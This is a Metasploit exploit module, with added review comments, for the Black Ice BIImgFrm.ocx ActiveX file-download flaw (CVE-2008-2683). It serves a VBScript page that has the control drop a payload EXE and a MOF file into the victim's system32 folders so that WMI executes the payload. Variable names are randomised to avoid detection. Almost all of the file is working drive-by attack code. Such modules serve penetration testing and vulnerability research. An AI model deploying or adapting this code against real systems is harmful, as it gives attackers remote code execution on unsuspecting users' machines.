##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
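class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({
  #   :os_name => OperatingSystems::Match::WINDOWS,
  #   :ua_name => HttpClients::IE,
  #   :javascript => true,
  #   :rank => NormalRanking,
  #   :classid => "{79956462-F148-497F-B247-DF35A095F80B}",
  #   :method => "DownloadImageFileURL",
  # })

  # Module metadata. The chain is: page -> control downloads the EXE into
  # system32 -> (4s later) control downloads a MOF into wbem\mof -> WMI runs
  # the EXE. The description states this only works before Vista.
  #
  # @param info [Hash] metadata merged by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Black Ice Cover Page ActiveX Control Arbitrary File Download',
        'Description' => %q{
          This module allows remote attackers to place arbitrary files on a users file system
          by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX
          Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the
          payload to the remote machine, and then upload another mof file, which enables Windows
          Management Instrumentation service to execute the binary. Please note that this module
          currently only works for Windows before Vista. Also, a similar issue is reported in
          BIDIB.ocx (10.9.3.0) within the Barcode SDK.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'shinnai', # original discovery
          'mr_me <steventhomasseeley[at]gmail.com>', # msf
          'sinn3r' # wbemexec tekniq
        ],
        'References' => [
          [ 'CVE', '2008-2683'],
          [ 'OSVDB', '46007'],
          [ 'BID', '29577'],
          [ 'EDB', '5750' ],
        ],
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # Windows before Vista
          [ 'Automatic', {} ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2008-06-05',
        # NOTE(review): on_request_uri drops two files under C:\WINDOWS\system32
        # on the victim (the EXE and the MOF); the side-effect notes below still
        # say "unknown" and should be updated to record those on-disk artifacts.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Never auto-filter this module: the BrowserAutopwn wiring above is
  # commented out, so the page is served to whoever requests it.
  #
  # @return [Boolean] always false
  def autofilter
    false
  end

  # Pre-flight dependency check. use_zlib comes from the mixins and
  # verifies zlib is available before the server starts -- presumably for
  # response compression; confirm against the HttpServer mixin.
  def check_dependencies
    use_zlib
  end

  # Single URI handler for all three stages, dispatched on the request path:
  #   *.EXE          -> the payload executable built in #exploit
  #   *.MOF          -> a MOF generated on the fly that names the dropped EXE
  #   anything else  -> the HTML/VBScript page that drives the ActiveX control
  #
  # NOTE(review): @payload_name and @mof_name are module-wide, not per client.
  # Every page request overwrites them, so with several victims in flight a
  # later page request changes the EXE name an earlier victim's MOF will
  # reference. Confirm whether multi-target use matters before relying on it.
  #
  # @param cli the client connection the response is written to
  # @param request the HTTP request; only its URI is inspected
  def on_request_uri(cli, request)
    uri = request.uri

    # Stage 2: the control fetches the EXE named in the page.
    if uri =~ /\.EXE/
      print_status("Sending EXE payload...")
      send_response(cli, @payload, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # Stage 3: the control fetches the MOF. It is generated here rather than
    # in #exploit because it has to embed the EXE name chosen for the page.
    if uri =~ /\.MOF/
      # A MOF request that arrives before any page was served has nothing to
      # reference; nothing is sent back and the handler simply returns.
      return unless @mof_name && @payload_name

      print_status("Generating mof")
      mof = generate_mof(@mof_name, @payload_name)
      print_status("Sending MOF")
      send_response(cli, mof, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # Stage 1: serve the page. Absolute URLs are handed to the control, so the
    # base must end with a slash before the file names are appended.
    url = get_uri(cli)
    url += '/' unless url.end_with?('/')

    # VBScript identifiers are randomised per page so the served HTML has no
    # fixed signature. The two file names live in instance variables because
    # the later .MOF request needs them.
    clsid = "79956462-F148-497F-B247-DF35A095F80B"
    method = "DownloadImageFileURL"
    blackice = rand_text_alpha(rand(1..100))                  # BlackIce object ID
    @payload_name = rand_text_alpha(rand(1..10)) + ".EXE"     # Payload file name on the victim
    payload_vbs_url_name = rand_text_alpha(5)                 # Payload's vbs URL var name
    payload_vbs_lpath = rand_text_alpha(6)                    # Payload's vbs local-path var name
    @mof_name = rand_text_alpha(rand(1..10)) + ".MOF"         # MOF file name on the victim
    mof_vbs_url_name = rand_text_alpha(5)                     # MOF's vbs URL var name
    mof_vbs_lpath = rand_text_alpha(6)                        # MOF's vbs local-path var name
    sub_name = rand_text_alpha(rand(1..10))                   # Subroutine name

    # Drop locations are literal paths handed straight to the control, so
    # C:\WINDOWS is hard-coded (no %SystemRoot% expansion): a target with a
    # non-default system directory will miss. The wbem\mof directory is what
    # ties this to pre-Vista Windows -- per the description, WMI there picks up
    # the dropped MOF and executes the binary it names.
    #
    # Slow-connection friendly: the MOF drop is deferred by 4 seconds so it
    # does not interrupt the EXE download started just before it.
    content = <<-EOS
    <html>
    <object classid='clsid:#{clsid}' id='#{blackice}' ></object>
    <script language='vbscript'>
    sub #{sub_name}
    #{mof_vbs_url_name} = "#{url}#{@mof_name}"
    #{mof_vbs_lpath} = "C:\\WINDOWS\\system32\\wbem\\mof\\#{@mof_name}"
    #{blackice}.#{method} #{mof_vbs_url_name}, #{mof_vbs_lpath}
    end sub

    #{payload_vbs_url_name} = "#{url}#{@payload_name}"
    #{payload_vbs_lpath} = "C:\\WINDOWS\\system32\\#{@payload_name}"
    #{blackice}.#{method} #{payload_vbs_url_name}, #{payload_vbs_lpath}
    setTimeout "#{sub_name}()", 4000
    </script>
    </html>
    EOS

    # The heredoc body carries four spaces of Ruby indentation (spaces, not
    # tabs); strip them so the page goes out flush-left.
    content = content.gsub(/^ {4}/, '')

    print_status("Sending exploit HTML")
    send_response_html(cli, content)
    handler(cli)
  end

  # Build the payload EXE once, before the HTTP server is started by super,
  # so every .EXE request in on_request_uri serves the same bytes.
  def exploit
    @payload = generate_payload_exe
    super
  end
end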